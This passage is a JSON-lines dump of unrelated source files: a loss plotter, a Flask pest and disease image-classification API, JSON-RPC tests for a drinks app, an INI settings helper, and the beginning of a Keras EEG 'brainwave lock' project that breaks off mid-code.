+{"seq_id":"582411379","text":"# -*- coding:utf-8 -*-\nimport matplotlib.pyplot as plt\n\nwith open('log.txt') as file:\n train_loss = []\n val_loss = []\n logs = file.readlines()\n for log in logs:\n key = log.split(',')[2].split(':')[0]\n value = log.split(',')[2].split(':')[1]\n if key == ' loss':\n train_loss.append(float(value))\n elif key == ' val loss':\n val_loss.append(float(value))\n\n\nx = range(len(train_loss[::]))\nplt.plot(x,train_loss[::],color='blue',label='train loss')\n#plt.plot(x,val_loss,color='red',label='val loss')\nplt.legend()\nplt.show() \n","sub_path":"Vnet/loss_curve.py","file_name":"loss_curve.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"48756982","text":"import cv2\nimport numpy as np\nimport json\nimport os\nimport csv\nimport copy\nimport json\nfrom skimage import io\nfrom skimage import data\nfrom skimage import color\nfrom skimage.color import label2rgb\nfrom skimage.feature import canny\nfrom scipy import ndimage\nfrom skimage import morphology\nfrom skimage.filters import sobel,threshold_otsu, threshold_adaptive\nfrom skimage.util import img_as_ubyte\nfrom skimage.morphology import erosion, dilation, opening, closing, white_tophat\nfrom skimage.morphology import disk\nfrom skimage.feature import greycomatrix, greycoprops\nfrom skimage import measure\nfrom skimage.measure import label\nfrom flask.ext.cors import CORS, cross_origin\nfrom flask import Flask, request,g\nfrom mahotas.features import haralick\n\napp = Flask(__name__)\ncors = CORS(app)\n\nglobal pests\nglobal pestANN \nglobal diseases\nglobal diseaseANN\n\ndef getSpecies(filename):\n\tspecies=[]\n\twith open(filename,'rb') as f:\n\t\treader = csv.reader(f)\n\t\tfor row in reader:\n\t\t species.append(row[-1])\n\n\treturn species\n\ndef initANN(filename,species,nhidden,step_size,momentum,nsteps,max_err):\n\ttrainingdata=[]\n\twith open(filename,'rb') as f:\n\t reader = csv.reader(f)\n\t for row in reader:\n\t trainingdata.append(row[:-1])\n\tinputs = np.empty( (len(trainingdata), len(trainingdata[0])), 'float' )\n\n\tfor i in range(len(trainingdata)):\n\t a = np.array(list(trainingdata[i]))\n\t f = a.astype('float')\n\t inputs[i,:]=f[:]\n\n\ttargets= -1 * np.ones( (len(inputs), len(species)), 'float' )\n\n\ti=0\n\twith open(filename,'rb') as f:\n\t reader = csv.reader(f)\n\t for row in reader:\n\t targets[i][species.index(row[-1])]=1\n\t i=i+1\n\n\tninputs = len(trainingdata[0])#number of features\n\tnoutput = len(species)#number of classes\n\tlayers = np.array([ninputs, nhidden, noutput])\n\t\n\tnnet = cv2.ANN_MLP(layers)\n\n\tcondition = cv2.TERM_CRITERIA_COUNT | cv2.TERM_CRITERIA_EPS\n\tcriteria = (condition, nsteps, max_err)\n\t\n\tparams = dict( term_crit = criteria,train_method = cv2.ANN_MLP_TRAIN_PARAMS_BACKPROP,bp_dw_scale = step_size, bp_moment_scale = momentum )\n\tnum_iter = nnet.train(inputs,targets,None,params=params)\n\n\treturn nnet\n\t\n\t\ndef pestFeatureExtraction(filename):\n\tselem = disk(8)\n\timage = data.imread(filename,as_grey=True)\n\tthresh = threshold_otsu(image)\n\televation_map = sobel(image)\n\tmarkers = np.zeros_like(image)\n\n\tif ((image (image>thresh).sum()):\n\t\tmarkers[image < thresh] = 1\n\t\tmarkers[image > thresh] = 2\n\telse:\n\t\tmarkers[image < thresh] = 2\n\t\tmarkers[image > thresh] = 1\n\n\tsegmentation = morphology.watershed(elevation_map, markers)\n\tsegmentation = dilation(segmentation-1, selem)\n\tsegmentation = ndimage.binary_fill_holes(segmentation)\n\n\tsegmentation = np.logical_not(segmentation)\n\timage[segmentation]=0;\n\n\thist = np.histogram(image.ravel(),256,[0,1])\n\n\thist = list(hist[0])\n\thist[:] = [float(x) / (sum(hist) - hist[0]) for x in hist]\n\thist.pop(0)\n\n\tfeatures = np.empty( (1, len(hist)), 'float' )\n\t\n\ta = np.array(list(hist))\n\tf = a.astype('float')\n\tfeatures[0,:]=f[:]\n\n\treturn features\n\ndef checkPythonImage(img):\n\n\theight, width, depth = img.shape\n\tangle = 90\n\tif height > width:\n\t\timageCenter = tuple(np.array(img.shape)/2)\n\t\timg = ndimage.rotate(img, 90)\n\t \n\tbaseheight = 840\n\thpercent = (baseheight / float(width))\n\twsize = int((float(height) * float(hpercent)))\n\tresizeImg = cv2.resize(img, (800, 640))\n\n\treturn resizeImg\n\ndef 
checkPythonGrayImage(img):\n\n\theight, width = img.shape\n\tangle = 90\n\tif height > width:\n\t\timageCenter = tuple(np.array(img.shape)/2)\n\t\timg = ndimage.rotate(img, 90)\n\t \n\tbaseheight = 840\n\thpercent = (baseheight / float(width))\n\twsize = int((float(height) * float(hpercent)))\n\tresizeImg = cv2.resize(img, (800, 640))\n\n\treturn resizeImg\n\ndef diseaseFeatureExtraction(filename):\n\tselem = disk(8)\n\n\t#THRESHOLDING STUFFFFFFFFFFFFFFFFFFFFFFFFFFFF\n\timage = data.imread(filename)\n\timage = checkPythonImage(image)\n\n\thsv2 = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n\tgrayimage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\tgrayimage = checkPythonGrayImage(grayimage)\n\n\tthresh = threshold_otsu(grayimage)\n\n\televation_map = sobel(grayimage)\n\n\tmarkers = np.zeros_like(grayimage)\n\n\tif ((grayimage<thresh).sum() > (grayimage>thresh).sum()):\n\t\tmarkers[grayimage < thresh] = 1\n\t\tmarkers[grayimage > thresh] = 2\n\telse:\n\t\tmarkers[grayimage < thresh] = 2\n\t\tmarkers[grayimage > thresh] = 1\n\n\n\tsegmentation = morphology.watershed(elevation_map, markers)\n\n\tsegmentation = dilation(segmentation-1, selem)\n\tsegmentation = ndimage.binary_fill_holes(segmentation)\n\n\tsegmentation = np.logical_not(segmentation)\n\tgrayimage[segmentation]=0;\n\n\twatershed_mask = np.empty_like(grayimage, np.uint8)\n\twidth = 0\n\theight = 0\n\twhile width < len(watershed_mask):\n\n\t\twhile height < len(watershed_mask[width]):\n\n\t\t\tif grayimage[width][height] == 0:\n\t\t\t\twatershed_mask[width][height] = 0\n\t\t\telse:\n\t\t\t\twatershed_mask[width][height] = 1\n\n\t\t\theight += 1\n\t\t\tpass\n\n\t\twidth += 1\n\t\theight = 0\n\t\tpass\n\n\n\n\t#SPLITTING STUFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\n\timage = cv2.bitwise_and(image,image,mask = watershed_mask)\n\thsv = ''\n\tif image.shape[2] == 3:\n\t\thsv = color.rgb2hsv(image)\n\telif image.shape[2] == 4:\n\t\timage = cv2.cvtColor(image, cv2.COLOR_BGRA2BGR)\n\t\thsv = color.rgb2hsv(image)\n\th,s,v = cv2.split(hsv2)\n\n\t#MASKING STUFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\n\tmask = cv2.inRange(h, 40, 80)\n\tcv2.bitwise_not(mask, mask)\n\n\tres = cv2.bitwise_and(image,image, mask= mask)\n\tres_gray = cv2.bitwise_and(grayimage,grayimage, mask=mask)\n\t\n\tharfeatures = haralick(res.astype(int), ignore_zeros=True, return_mean=True)\n\n\t#glcm = greycomatrix(res_gray, [5], [0], 256)\n\t#contrast = greycoprops(glcm, 'contrast')[0, 0]\n\t#ASM = greycoprops(glcm, 'ASM')[0, 0]\n\t#dissimilarity = greycoprops(glcm, 'dissimilarity')[0, 0]\n\t#homogeneity = greycoprops(glcm, 'homogeneity')[0, 0]\n\t#energy = greycoprops(glcm, 'energy')[0, 0]\n\t\n\tfeatures = []\n\t\n\t#features.append(contrast)\n\t#features.append(ASM) \n\t#features.append(dissimilarity)\n\t#features.append(homogeneity)\n\t#features.append(energy)\n\n\thist = cv2.calcHist([res],[0],None,[256],[0,256])\n\tw, h, c = res.shape\n\tnumPixel = w * h\n\n\tnum = 0\n\tfor index in hist:\n\n\t\tif num != 0 and num<255:\n\t\t\tfeatures.append(index[0]/(numPixel-hist[0][0]))\n\n\t\tnum = num + 1\n\n\t\tpass\n\n\tfor harfeature in harfeatures:\n\t\tfeatures.append(harfeature)\n\t\tpass\t\n\n\toutput = np.empty( (1, len(features)), 'float' )\n\t\n\ta = np.array(list(features))\n\toutput[0,:]=a[:]\n\treturn output\n\ndef predict(nnet,species,features):\n\tprediction = np.empty(shape=(1,len(species)))\n\tnnet.predict(features,prediction)\n\n\treturn prediction[0]\n\n\n@app.route(\"/pestImageSearch\",methods=[\"POST\"])\ndef pestImageSearch():\n\tfilename = request.form.get(\"filename\",\"\")\n\n\tpestFeatures = 
pestFeatureExtraction(filename)\n\n\tpestPrediction = predict(pestANN,pests,pestFeatures)\n\t\n\tsortedPestPrediction=np.argsort(pestPrediction)[::-1]\n\tpestData=[]\n\tfor i in xrange(0,5):\n\t\tpestData.append({'name':pests[sortedPestPrediction[i]],'confidence':pestPrediction[sortedPestPrediction[i]]})\n\n\t#result = {'data': pestData, 'features': pestFeatures[0].tolist() }\n\tresult = {'data': pestData}\n\n\treturn json.dumps(result)\n\n@app.route(\"/diseaseImageSearch\",methods=[\"POST\"])\ndef diseaseImageSearch():\n\tfilename = request.form.get(\"filename\",\"\")\n\n\tdiseaseFeatures = diseaseFeatureExtraction(filename)\n\n\tdiseasePrediction = predict(diseaseANN,diseases,diseaseFeatures)\n\t\n\tsortedDiseasePrediction=np.argsort(diseasePrediction)[::-1]\n\tdiseaseData=[]\n\tfor i in xrange(0,5):\n\t\tdiseaseData.append({'name':diseases[sortedDiseasePrediction[i]],'confidence':diseasePrediction[sortedDiseasePrediction[i]]})\n\t\n\t#result = {'data': diseaseData,'features':diseaseFeatures[0].tolist()}\n\n\tresult = {'data': diseaseData}\n\n\treturn json.dumps(result)\n\n@app.route(\"/addTrainingData\",methods=[\"POST\"])\ndef addTrainingData():\t\n\tflag = request.form.get(\"flag\",\"\")\n\tfilename = request.form.get(\"filename\",\"\")\n\t\n\tif flag != \"true\":\n\t\tos.remove(filename)\n\telse:\n\t\tclassification = request.form.get(\"type\",\"\")\n\t\ttarget = request.form.get(\"target\",\"\")\n\t\t\n\t\tDIR = \"pending/\"+classification+\"/\"+target\n\t\tif not os.path.exists(DIR):\n\t\t\tos.makedirs(DIR)\n\t\tindex = len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))])\n\t\t\n\t\tos.rename(filename,DIR+\"/\"+str(index)+\".jpg\")\n\n\treturn \"HAHAHAHAHAHA\"\n\n# @app.route(\"/pestAddTrainingData\",methods=[\"POST\"])\n# def pestAddTrainingData():\n# \tfeatures = request.form.get(\"input\",\"\")\n# \ttarget = request.form.get(\"target\",\"\")\n# \tfeatures = features.split(\",\")\n# \tfeatures = map(float, features)\n\t\n# \tinputs = np.empty( (1, len(features)), 'float' )\n# \ta = np.array(list(features))\n# \tf = a.astype('float')\n# \tinputs[0,:]=f[:]\n\n# \ttargets= -1 * np.ones( (1, len(pests)), 'float' )\n\n# \ttargets[0][pests.index(target)]=1\n\n# \tcondition = cv2.TERM_CRITERIA_COUNT | cv2.TERM_CRITERIA_EPS\n# \tcriteria = (condition, 900, 0.0000000001)\n\t\n# \tparams = dict( term_crit = criteria,train_method = cv2.ANN_MLP_TRAIN_PARAMS_BACKPROP,bp_dw_scale = 0.1, bp_moment_scale = 0.003 )\n\n# \t#pestANN.train(inputs,targets,None,params=params,flags=cv2.ANN_MLP_UPDATE_WEIGHTS)\n\n# \treturn \"HAHA\"\n\n# @app.route(\"/diseaseAddTrainingData\",methods=[\"POST\"])\n# def diseaseAddTrainingData():\n# \tfeatures = request.form.get(\"input\",\"\")\n# \ttarget = request.form.get(\"target\",\"\")\n# \tfeatures = features.split(\",\")\n# \tfeatures = map(float, features)\n\t\n# \tinputs = np.empty( (1, len(features)), 'float' )\n# \ta = np.array(list(features))\n# \tf = a.astype('float')\n# \tinputs[0,:]=f[:]\n\n# \ttargets= -1 * np.ones( (1, len(diseases)), 'float' )\n\n# \ttargets[0][diseases.index(target)]=1\n\n# \tcondition = cv2.TERM_CRITERIA_COUNT | cv2.TERM_CRITERIA_EPS\n# \tcriteria = (condition, 50000, 0.0000000001)\n\t\n# \tparams = dict( term_crit = criteria,train_method = cv2.ANN_MLP_TRAIN_PARAMS_BACKPROP,bp_dw_scale = 0.08, bp_moment_scale = 0.003 )\n\n# \t#diseaseANN.train(inputs,targets,None,params=params,flags=cv2.ANN_MLP_UPDATE_WEIGHTS)\n\n# \treturn \"HAHA\"\n\n\t\n\nif __name__ == \"__main__\":\n\tpests = 
getSpecies('pests.csv')\n\tpestANN = initANN('pesttraining.csv',pests, 90, 0.003, 0.1, 900, 0.0000000001)\n\t#diseases = getSpecies('diseases.csv')\n\t#diseaseANN = initANN('diseasetraining.csv',diseases, 64, 0.003, 0.08, 50000, 0.0000000001)\n\tapp.run(debug=True, host = '127.0.0.1')\n\t\n","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":10195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"205991858","text":"#! /usr/bin/env python\nimport sys, os.path\nimport simplejson\nimport urllib2\nimport app, recipes\nimport StringIO\nimport collections\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\nfrom drinkz import db\nfrom recipes import Recipe\n\ndef call_remote(method, params, id):\n d = dict(method = method, params = params, id = id)\n\n environ = {}\n environ['PATH_INFO'] = '/rpc'\n environ['REQUEST_METHOD'] = 'POST'\n environ['CONTENT_LENGTH'] = len(simplejson.dumps(d))\n environ['wsgi.input'] = StringIO.StringIO(simplejson.dumps(d))\n\n\n d={}\n\n def my_start_response(s, h, return_in = d):\n d['status'] = s\n d['headers'] = h\n\n app_obj = app.SimpleApp()\n results = app_obj(environ, my_start_response)\n\n status, headers = d['status'], d['headers']\n\n result = \"\".join(results)\n\n assert ('Content-Type', 'application/json') in headers\n assert status == '200 OK'\n\n return result\n\ndef test_json_convert_units_to_ml():\n conversion = call_remote('convert_units_to_ml', [\"1 gallon\"], '1')\n\n rpc_request = simplejson.loads(conversion)\n\n result = rpc_request['result']\n\n assert result == 3785.41, result\n\ndef test_json_get_recipe_names():\n make_test_db()\n\n names = call_remote('get_recipe_names', [], '1')\n\n rpc_request = simplejson.loads(names)\n\n result = rpc_request['result']\n\n correct_result = ['kraken destroyer', 'kraken and cola']\n\n assert collections.Counter(result) == collections.Counter(correct_result), result\n\ndef test_json_get_liquor_inventory():\n make_test_db()\n\n inventory = call_remote('get_liquor_inventory', [], 1)\n\n rpc_request = simplejson.loads(inventory)\n\n result = rpc_request['result']\n\n assert ['Kraken', 'dark spiced rum'] in result, result\n assert ['Bols', 'blue curacao'] in result, result\n assert ['Hypnotiq', 'original'] in result, result\n assert ['Uncle John\\'s', 'original cider'] in result, result\n\ndef make_test_db():\n db._reset_db()\n\n db.add_bottle_type('Kraken', 'dark spiced rum', 'dark spiced rum')\n db.add_to_inventory('Kraken', 'dark spiced rum', '750 ml')\n\n db.add_bottle_type('Bols', 'blue curacao', 'citrus liqeur')\n db.add_to_inventory('Bols', 'blue curacao', '500 ml')\n \n db.add_bottle_type('Hypnotiq', 'original', 'berry liqeur')\n db.add_to_inventory('Hypnotiq', 'original', '750 ml')\n\n db.add_bottle_type('Uncle John\\'s', 'original cider', 'apple cider')\n db.add_to_inventory('Uncle John\\'s', 'original cider', '1 g')\n\n kraken_destroyer = Recipe('kraken destroyer', [('dark spiced rum',\n '4.5 oz'), ('citrus liqeur', \n '1 oz'), ('berry liqeur', \n '1 oz'), ('apple cider', \n '8 oz')])\n db.add_recipe(kraken_destroyer)\n\n kraken_and_cola = Recipe('kraken and cola', [('dark spiced rum', '6 oz'),\n ('cola', '8 oz')])\n db.add_recipe(kraken_and_cola)\n\n","sub_path":"drinkz/test_jsonrpc.py","file_name":"test_jsonrpc.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"255922333","text":"from typing import List\r\nfrom enum import IntEnum\r\nimport configparser\r\nimport os\r\n\r\nimport helpers.settings_properties as prop\r\n\r\n\r\nclass BadIniException(Exception):\r\n pass\r\n\r\n\r\nclass PropertyOwner(type):\r\n def __new__(mcs, name, bases, attrs):\r\n # Ищет члены, унаследованные от Property и устанавливает им поля name в соответствии с инменем переменной\r\n for n, v in attrs.items():\r\n if issubclass(type(v), prop.Property):\r\n v.name = n\r\n return super(PropertyOwner, mcs).__new__(mcs, name, bases, attrs)\r\n\r\n\r\ndef add_properties_to_class(instance, a_properties):\r\n \"\"\"\r\n Создает новый класс со свойством prop_name типа propr, унаследованный от instance\r\n \"\"\"\r\n class_name = instance.__class__.__name__ + 'WithProperties'\r\n child_class = type(class_name, (instance.__class__,), a_properties)\r\n instance.__class__ = child_class\r\n\r\n\r\nclass Settings(metaclass=PropertyOwner):\r\n\r\n class ValueType(IntEnum):\r\n INT = 0\r\n FLOAT = 1\r\n LIST_FLOAT = 2\r\n LIST_INT = 3\r\n STRING = 4\r\n BYTES = 5\r\n\r\n class VariableInfo:\r\n def __init__(self, a_name: str, a_section: str, a_type, a_default=None):\r\n self.name = a_name\r\n self.section = a_section\r\n self.type_ = a_type\r\n self.default = a_default\r\n\r\n def __init__(self, a_ini_path, a_variables: List[VariableInfo]):\r\n self.ini_path = a_ini_path\r\n self.settings = configparser.ConfigParser()\r\n\r\n self.__variables = {}\r\n self.__sections = set()\r\n\r\n for variable in a_variables:\r\n self.add_variable(variable)\r\n add_properties_to_class(self, self.__variables)\r\n\r\n self.restore()\r\n\r\n def add_variable(self, a_variable_info: VariableInfo):\r\n if a_variable_info.type_ == Settings.ValueType.LIST_FLOAT:\r\n self.__variables[a_variable_info.name] = prop.ListOfFloatProperty(\r\n self.ini_path, self.settings, a_variable_info.section, a_variable_info.default)\r\n elif a_variable_info.type_ == Settings.ValueType.LIST_INT:\r\n self.__variables[a_variable_info.name] = prop.ListOfIntProperty(\r\n self.ini_path, self.settings, a_variable_info.section, a_variable_info.default)\r\n elif a_variable_info.type_ == Settings.ValueType.FLOAT:\r\n self.__variables[a_variable_info.name] = prop.FloatProperty(\r\n self.ini_path, self.settings, a_variable_info.section, a_variable_info.default)\r\n elif a_variable_info.type_ == Settings.ValueType.INT:\r\n self.__variables[a_variable_info.name] = prop.IntProperty(\r\n self.ini_path, self.settings, a_variable_info.section, a_variable_info.default)\r\n elif a_variable_info.type_ == Settings.ValueType.STRING:\r\n self.__variables[a_variable_info.name] = prop.StringProperty(\r\n self.ini_path, self.settings, a_variable_info.section, a_variable_info.default)\r\n elif a_variable_info.type_ == Settings.ValueType.BYTES:\r\n self.__variables[a_variable_info.name] = prop.BytesProperty(\r\n self.ini_path, self.settings, a_variable_info.section, a_variable_info.default)\r\n else:\r\n assert False, \"Settings: Нереализованный тип\"\r\n\r\n self.__sections.add(a_variable_info.section)\r\n\r\n def add_ini_section(self, a_name: str):\r\n if not self.settings.has_section(a_name):\r\n self.settings.add_section(a_name)\r\n\r\n def restore(self):\r\n try:\r\n if not os.path.exists(self.ini_path):\r\n self.save()\r\n\r\n for section in self.__sections:\r\n self.add_ini_section(section)\r\n\r\n self.settings.read(self.ini_path)\r\n\r\n except configparser.ParsingError:\r\n raise BadIniException\r\n\r\n def save(self):\r\n with 
open(self.ini_path, 'w') as config_file:\r\n            self.settings.write(config_file)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    # Usage example\r\n    a = Settings(\"./test_settings.ini\", [\r\n        Settings.VariableInfo(a_name=\"list_float\", a_section=\"PARAMETERS\", a_type=Settings.ValueType.LIST_FLOAT),\r\n        Settings.VariableInfo(a_name=\"list_int\", a_section=\"PARAMETERS\", a_type=Settings.ValueType.LIST_INT),\r\n        Settings.VariableInfo(a_name=\"float1\", a_section=\"PARAMETERS\", a_type=Settings.ValueType.FLOAT, a_default=123.),\r\n        Settings.VariableInfo(a_name=\"int1\", a_section=\"PARAMETERS\", a_type=Settings.ValueType.INT, a_default=222),\r\n        Settings.VariableInfo(a_name=\"str1\", a_section=\"PARAMETERS\", a_type=Settings.ValueType.STRING, a_default=\"haha\")\r\n    ])\r\n\r\n    print(a.list_float, a.list_int, a.float1, a.int1, a.str1)\r\n\r\n    a.list_float = [31., 33., 333.]\r\n    a.list_int = [11, 2, 3]\r\n    a.float1 = 11.\r\n    a.int1 = 331\r\n    a.str1 = \"he1he\"\r\n\r\n    print(a.list_float, a.list_int, a.float1, a.int1, a.str1)\r\n","sub_path":"helpers/settings_ini_parser.py","file_name":"settings_ini_parser.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"399332202","text":"################## 项目名称: “Mind Locker:一种基于神经网络与深度学习的脑纹锁系统” ####################\n\n################## 拟解决的关键问题 #####################\n'''\n目前所采用的主流生物特征加密与识别,如指纹/瞳孔/人脸识别,因其易于伪造,特征值数量有限以及重复率高等因素,几乎一一被攻克,安全性受到极大挑战。比如,目前英伟达GAN人工智能的虚拟人脸生成技术,几乎攻陷了目前所有人脸识别系统。所以,在一些对安全性要求极高的应用场合(如巨额银行转账,进出军事领域等),传统生物特征加密方法的安全性,已经受到了严重的挑战。除人脸,瞳孔,指纹识别外,我们还有其他更为先进与安全的生物特征加密手段么? 答案是:大脑。每个人的大脑,其生物特征都是真正意义上的独一无二。利用脑电波的生物特征作为一种加密手段,这就是我现在所设计的一种基于深度学习/神经网络的脑纹加密与识别技术-“Mind Locker\",它具备如下特征:\n\n1.\t采用全连接深度学习神经网络,架构简洁,训练时长短,从脑电波EEG采样到训练并设置完毕仅需时2~3分钟。每次识别验证则仅需时8~10秒。\n2.\t采样过程中,可通过想象某一画面/场景/事物等,以增加其加密复杂度。\n3.\t识别正确率极高,几乎接近100%。\n4.\t安全性极高,因为脑电波是持续动态变化的连续帧数据流,而非指纹/人脸等静态特征值,所以伪匹配的可能性几乎为零。\n\n\n'''\n################ 主要创意点 革新点 与建议 ################\n'''\n脑电波EEG生物特征复杂,每一帧EEG均包含24条生物特征值(5频段的电平峰值/均值/实时值,8通道的EMG值,Focus值),且所有特征值均处于动态变化中,它们相互之间的非线性数学关系一起构成了这颗大脑的完整生物特征网。系统设计的核心在于学习与提取出这24条特征值相互间的全连接动态数学关系。如需破解,则必须完全再现此动态数学关系,且能在伪数据流的所有帧中维持此关系,所以几乎不存在破解的可能性。\n\n借助目前神经网络的深度学习技术,我实现了让计算机去学习与提取上述数学关系,达到了99.9%以上的识别率。训练样本为实时采集的2k帧EEG数据,陪训样本为4k帧随机抽取的EEG样本库(样本库采集自学校500名同学)。神经网络结构为[input:24*240*240*240*1:output], 训练规模为200帧*200次。隐藏层采用Relu激活函数。输出层采用Sigmoid激活函数形成逻辑回归判断。\n\n服务端数据采集系统为OpenBCI(语言:Processing),客户端AI框架为 Keras+Tensorflow(语言:Python)。\n\n硬件基于OpenBCI传感器,核心为 美国TI德州仪器ADS1299采样芯片(8通道,16khz,24bits) \n\n\n'''\n\nimport sys\nimport socket \nfrom PyQt5.QtWidgets import QApplication , QMainWindow\n#class Ui_MainWindow(QtWidgets.QMainWindow): #用这个替换Ui_Mind_locker_Ui.py 的 class Ui_MainWindow(object):\n\nfrom Ui_Mind_Locker_Ui import *\nimport numpy as np\nimport random\nfrom PyQt5.QtWidgets import QFileDialog\nfrom PyQt5.QtCore import QFileInfo\n#import qdarkstyle\n\nfrom keras.models import Sequential, Model,load_model\nfrom keras.layers.core import Dense, Dropout,Activation,regularizers\nfrom keras.optimizers import RMSprop\nfrom keras.utils import np_utils\nfrom keras.callbacks import TensorBoard\n\n#################### 全局超参数 ##############################\ntotal_EEG_data_number=1000 #读取n条EEG数据\ntotal_EEG_Features=24 #这是固定的。每一条EEG数据都有24个参数值。\ntraining_times=200 #训练的次数\ntraining_batch_size=200 #每次训练输入的EEG帧数\ntotal_EEG_data_number_for_test=50 #每次检测所采样的EEG帧数\nserver_address='127.0.0.1'\nstep=1 #此参数是:action()的操作的步骤的标志。\nfilename=''\ndirectly_load_filename=''\nmatch_triger=0.99 #此参数设置了每一帧的通过测试的阀门值。\ntotal_EEG_data_number_times=20\ndirectly_load_model_flag=False #此参数是:是否直接读取预训练模型的标志。\n\ndef action(): #此函数是控制整个采样,训练, 匹配测试的过程。\n global filename,total_EEG_data_number_for_test\n global step,directly_load_model_flag,openfile_name,directly_load_filename\n filename=ui.lineEdit.text() #写入文件名\n\n if step==3: # 匹配测试\n disable_Gui()\n ui.label.setText(\"匹配测试中...\")\n ui.label.repaint()\n ui.pushButton.setText(\"匹配测试中...\") \n ui.pushButton.repaint()\n\n if directly_load_model_flag==False:\n model=load_model(filename+'_key.h5')\n if directly_load_model_flag==True:\n model=load_model(directly_load_filename)\n s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n s.connect((server_address,5204)) #5204 为 OPENBCI GUI的缺省服务器段的发送端口\n EEG_data_for_test=np.zeros([total_EEG_data_number_for_test,total_EEG_Features]) # EEG_data_for_test为采样的测试EEG帧。\n temp_total_EEG_data_number_for_test=total_EEG_data_number_for_test\n total_EEG_data_number_for_test=1 #把total_EEG_data_number_for_test赋值给temp_total_EEG_data_number_for_test后,total_EEG_data_number_for_test变为1,只是为了GUI的进度条显示测试的进度%。\n match_counter=0 # 用于计数EEG通过测试的个数。\n for times in range(temp_total_EEG_data_number_for_test): #这个大循环,内嵌一个1的小循环。 \n for k in range(total_EEG_data_number_for_test):\n 
EEG_data_one_line=(s.recv(1024).decode('utf-8')).split('A') ####按照字符\"A\"来截断每一条EEG数据,分割成24小份\n for i in range(total_EEG_Features):\n if len(EEG_data_one_line)==25: #这个判断是为了避免有时候读取EEG时候,遇到换行符丢失的现象。\n EEG_data_for_test[k][i]=float(EEG_data_one_line[i])\n else:\n EEG_data_for_test[k][i]=EEG_data_for_test[k-1][i]\n\n test=model.predict(EEG_data_for_test,verbose = 1)\n\n for k in range(total_EEG_data_number_for_test):\n if test[k]>=match_triger:\n match_counter+=1\n ui.progressBar.setProperty(\"value\", (times+1)/temp_total_EEG_data_number_for_test*100) \n\n result_text=\"匹配率为\"+str(match_counter/temp_total_EEG_data_number_for_test*100)+\"%\"\n ui.label.setText(result_text)\n ui.label.repaint()\n ui.lcdNumber.display(match_counter/temp_total_EEG_data_number_for_test*100)\n QApplication.processEvents() #用于PyQt界面的刷新,保证流畅程度。\n result_text=\"测试结束,最终匹配率为\"+str(match_counter/temp_total_EEG_data_number_for_test*100)+\"%\"\n ui.label.setText(result_text)\n ui.label.repaint()\n\n total_EEG_data_number_for_test=temp_total_EEG_data_number_for_test #重新恢复全局变量total_EEG_data_number_for_test的值。\n ui.pushButton.setText(\"开始匹配测试\") \n ui.pushButton.repaint()\n enable_Gui()\n\n if step==2: #机器学习\n disable_Gui()\n ui.label.setText(\"开始机器学习你的脑纹。\")\n ui.label.repaint()\n ui.pushButton.setText(\"2-设置中...\") \n ui.pushButton.repaint()\n\n\n ######################################### 开始训练 ######################################\n \n ####################### 读取代训练的EEG数据############################\n f = open(filename+'EEG.txt', 'r') #读取代训练的EEG数据\n All_EEG_data_lines=f.readlines()\n EEG_data_A=np.zeros([total_EEG_data_number,total_EEG_Features])\n\n for k in range(total_EEG_data_number):\n EEG_data_one_line=(All_EEG_data_lines[k].split('A')) ####按照字符\"A\"来截断每一条EEG数据,分割成24小份\n for i in range(total_EEG_Features):\n if len(EEG_data_one_line)==25: #这个判断是为了避免有时候读取EEG时候,遇到换行符丢失的现象。\n EEG_data_A[k][i]=float(EEG_data_one_line[i])\n else:\n EEG_data_A[k][i]=EEG_data_A[k-1][i]\n f.close()\n\n ###############读取代训练的EEG数据完毕######################\n\n\n ###############开始读取代陪训的Random 1/2 EEG数据######################\n f = open('random_EEG_1.txt', 'r') #这是用于参与训练的他人EEG\n All_EEG_data_lines=f.readlines()\n EEG_data_B=np.zeros([total_EEG_data_number,total_EEG_Features])\n\n for k in range(total_EEG_data_number):\n EEG_data_one_line=(All_EEG_data_lines[k].split('A')) ####按照字符\"A\"来截断每一条EEG数据,分割成24小份\n for i in range(total_EEG_Features):\n if len(EEG_data_one_line)==25: #这个判断是为了避免有时候读取EEG时候,遇到换行符丢失的现象。\n EEG_data_B[k][i]=float(EEG_data_one_line[i])\n else:\n EEG_data_B[k][i]=EEG_data_B[k-1][i]\n f.close()\n\n ###############读取random_EEG_1完毕######################\n\n f = open('random_EEG_2.txt', 'r') #这也是用于参与训练的他人EEG\n All_EEG_data_lines=f.readlines()\n EEG_data_C=np.zeros([total_EEG_data_number,total_EEG_Features])\n\n for k in range(total_EEG_data_number):\n EEG_data_one_line=(All_EEG_data_lines[k].split('A')) ####按照字符\"A\"来截断每一条EEG数据,分割成24小份\n for i in range(total_EEG_Features):\n if len(EEG_data_one_line)==25: #这个判断是为了避免有时候读取EEG时候,遇到换行符丢失的现象。\n EEG_data_C[k][i]=float(EEG_data_one_line[i])\n else:\n EEG_data_C[k][i]=EEG_data_C[k-1][i]\n f.close()\n\n ###############读取random_EEG_2完毕######################\n ##################读取代陪训的Random 1/2 EEG数据######################\n\n ########################开始合成总的数据样本(包括待训练数据,以及两个陪训数据#############################\n y0 = np.ones([total_EEG_data_number,1]) \n y1 = np.zeros([total_EEG_data_number,1]) \n y2 = np.zeros([total_EEG_data_number,1]) \n x=np.vstack((EEG_data_A,EEG_data_B,EEG_data_C))\n y = 
